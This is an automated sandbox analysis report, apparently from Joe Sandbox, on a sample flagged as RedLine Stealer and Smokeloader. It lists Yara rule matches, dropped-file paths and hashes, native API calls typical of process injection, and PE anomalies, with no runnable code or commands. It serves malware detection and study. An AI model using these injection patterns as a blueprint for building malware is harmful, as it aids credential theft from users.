Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Reads the System eventlog
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Found suspicious ZIP file
Source: venom.zip.15.dr Zip Entry: runvm.bat
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401513
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 0_2_00402FD3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess, 0_2_00403149
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401553
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040267C NtEnumerateKey, 0_2_0040267C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower, 0_2_00403303
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040151E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation, 0_2_004020C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026DC NtClose, 0_2_004026DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004025DD NtOpenKey, 0_2_004025DD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation, 0_2_004020E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation, 0_2_004020E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation, 0_2_004020FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402285 NtQuerySystemInformation, 0_2_00402285
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation, 0_2_004020B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation, 0_2_004020B8
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401513
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 4_2_00402FD3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00403149 RtlCreateUserThread,NtTerminateProcess, 4_2_00403149
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_00401553
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0040267C NtEnumerateKey, 4_2_0040267C
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00403303 NtTerminateProcess,GetModuleHandleA, 4_2_00403303
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040151E
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020C4 LocalAlloc,NtQuerySystemInformation, 4_2_004020C4
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004026DC NtClose, 4_2_004026DC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004025DD NtOpenKey, 4_2_004025DD
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020E3 LocalAlloc,NtQuerySystemInformation, 4_2_004020E3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation, 4_2_004020E7
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020FC LocalAlloc,NtQuerySystemInformation, 4_2_004020FC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00402285 NtQuerySystemInformation, 4_2_00402285
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020B6 LocalAlloc,NtQuerySystemInformation, 4_2_004020B6
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004020B8 LocalAlloc,NtQuerySystemInformation, 4_2_004020B8
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_00401513
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 7_2_00402FD3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00403149 RtlCreateUserThread,NtTerminateProcess, 7_2_00403149
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_00401553
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_0040267C NtEnumerateKey, 7_2_0040267C
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00403303 NtTerminateProcess,GetModuleHandleA, 7_2_00403303
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_0040151E
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020C4 LocalAlloc,NtQuerySystemInformation, 7_2_004020C4
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004026DC NtClose, 7_2_004026DC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004025DD NtOpenKey, 7_2_004025DD
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020E3 LocalAlloc,NtQuerySystemInformation, 7_2_004020E3
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020E7 EntryPoint,LocalAlloc,NtQuerySystemInformation, 7_2_004020E7
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020FC LocalAlloc,NtQuerySystemInformation, 7_2_004020FC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00402285 NtQuerySystemInformation, 7_2_00402285
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020B6 LocalAlloc,NtQuerySystemInformation, 7_2_004020B6
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004020B8 LocalAlloc,NtQuerySystemInformation, 7_2_004020B8
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D6900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation, 8_2_00007FF7A09D6900
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F4FC0 NtReadVirtualMemory, 8_2_00007FF7A09F4FC0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F59D0 NtProtectVirtualMemory, 8_2_00007FF7A09F59D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F3F30 NtQueryInformationProcess, 8_2_00007FF7A09F3F30
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F5100 NtWriteVirtualMemory, 8_2_00007FF7A09F5100
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F5260 NtAllocateVirtualMemory, 8_2_00007FF7A09F5260
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09AE810 8_2_00007FF7A09AE810
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D57C0 8_2_00007FF7A09D57C0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A0DFD0 8_2_00007FF7A0A0DFD0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09BA9D0 8_2_00007FF7A09BA9D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09AD7A0 8_2_00007FF7A09AD7A0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D43B0 8_2_00007FF7A09D43B0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A099C400 8_2_00007FF7A099C400
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A7000 8_2_00007FF7A09A7000
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A099BC00 8_2_00007FF7A099BC00
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09B4E00 8_2_00007FF7A09B4E00
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09BFC10 8_2_00007FF7A09BFC10
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A04E10 8_2_00007FF7A0A04E10
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F2010 8_2_00007FF7A09F2010
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E8C10 8_2_00007FF7A09E8C10
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09C29E0 8_2_00007FF7A09C29E0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D6DE0 8_2_00007FF7A09D6DE0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A149F0 8_2_00007FF7A0A149F0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A4BF0 8_2_00007FF7A09A4BF0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09ACFF0 8_2_00007FF7A09ACFF0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E6DF0 8_2_00007FF7A09E6DF0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E11F0 8_2_00007FF7A09E11F0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09C0740 8_2_00007FF7A09C0740
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A05D40 8_2_00007FF7A0A05D40
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D9550 8_2_00007FF7A09D9550
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D3150 8_2_00007FF7A09D3150
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A1920 8_2_00007FF7A09A1920
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A13F20 8_2_00007FF7A0A13F20
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F5B80 8_2_00007FF7A09F5B80
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09BD390 8_2_00007FF7A09BD390
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F898B 8_2_00007FF7A09F898B
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E7D60 8_2_00007FF7A09E7D60
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A16B70 8_2_00007FF7A0A16B70
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A099FB70 8_2_00007FF7A099FB70
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F4370 8_2_00007FF7A09F4370
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09EF370 8_2_00007FF7A09EF370
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A5ED0 8_2_00007FF7A09A5ED0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09B3AD0 8_2_00007FF7A09B3AD0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0995AD4 8_2_00007FF7A0995AD4
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D04D0 8_2_00007FF7A09D04D0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A116C0 8_2_00007FF7A0A116C0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09964A0 8_2_00007FF7A09964A0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09BB6A0 8_2_00007FF7A09BB6A0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A18AB0 8_2_00007FF7A0A18AB0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09ABAB0 8_2_00007FF7A09ABAB0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09DB6B0 8_2_00007FF7A09DB6B0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09F1700 8_2_00007FF7A09F1700
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A5910 8_2_00007FF7A09A5910
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09D1510 8_2_00007FF7A09D1510
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A099A0F0 8_2_00007FF7A099A0F0
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09ECC40 8_2_00007FF7A09ECC40
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A0050 8_2_00007FF7A09A0050
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0991450 8_2_00007FF7A0991450
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09EB020 8_2_00007FF7A09EB020
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A0A0C230 8_2_00007FF7A0A0C230
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A3E30 8_2_00007FF7A09A3E30
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09C9830 8_2_00007FF7A09C9830
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09EE430 8_2_00007FF7A09EE430
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09C1880 8_2_00007FF7A09C1880
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E3E80 8_2_00007FF7A09E3E80
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E2080 8_2_00007FF7A09E2080
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09E5860 8_2_00007FF7A09E5860
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F24196 11_2_00007FF848F24196
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F22C0A 11_2_00007FF848F22C0A
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F23430 11_2_00007FF848F23430
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F23D10 11_2_00007FF848F23D10
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F24752 11_2_00007FF848F24752
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F308C8 11_2_00007FF848F308C8
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F2D6FB 11_2_00007FF848F2D6FB
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF848F30F0D 11_2_00007FF848F30F0D
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 13_2_00007FF848F13420 13_2_00007FF848F13420
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 13_2_00007FF848F13C8C 13_2_00007FF848F13C8C
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 13_2_00007FF848F14742 13_2_00007FF848F14742
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 13_2_00007FF848F14186 13_2_00007FF848F14186
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 13_2_00007FF848F151B8 13_2_00007FF848F151B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D7189 14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D72DD 14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C52E0 14_2_004C52E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E2290 14_2_004E2290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E1B52 14_2_004E1B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D1B25 14_2_004D1B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004DEC40 14_2_004DEC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004F3CD0 14_2_004F3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FCD40 14_2_004FCD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E6F80 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FB840 14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FD010 14_2_004FD010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004DE086 14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004F8880 14_2_004F8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E6890 14_2_004E6890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E6F80 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C8960 14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FB160 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C4900 14_2_004C4900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E29C9 14_2_004E29C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FA9E4 14_2_004FA9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E41A0 14_2_004E41A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004CC270 14_2_004CC270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C7270 14_2_004C7270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E6210 14_2_004E6210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D82CB 14_2_004D82CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FD340 14_2_004FD340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FB350 14_2_004FB350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C6B70 14_2_004C6B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004CFB10 14_2_004CFB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E4BF0 14_2_004E4BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E33B6 14_2_004E33B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004DEC06 14_2_004DEC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E0CB7 14_2_004E0CB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C3DD0 14_2_004C3DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C5DE0 14_2_004C5DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FB5A0 14_2_004FB5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D4E68 14_2_004D4E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D3678 14_2_004D3678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004F3680 14_2_004F3680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D5E97 14_2_004D5E97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004FB700 14_2_004FB700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004C1F10 14_2_004C1F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004E3F97 14_2_004E3F97
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\3530.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\6E8A.exe 4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7C81.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
Found potential string decryption / allocating functions
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 004CFCA0 appears 202 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 004C93B0 appears 39 times
PE file contains more sections than normal
Source: 7C81.exe.2.dr Static PE information: Number of sections : 12 > 10
PE file does not import any functions
Source: 6E8A.exe.2.dr Static PE information: No import functions for PE file found
Source: 3530.exe.2.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2095582375.0000000002448000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
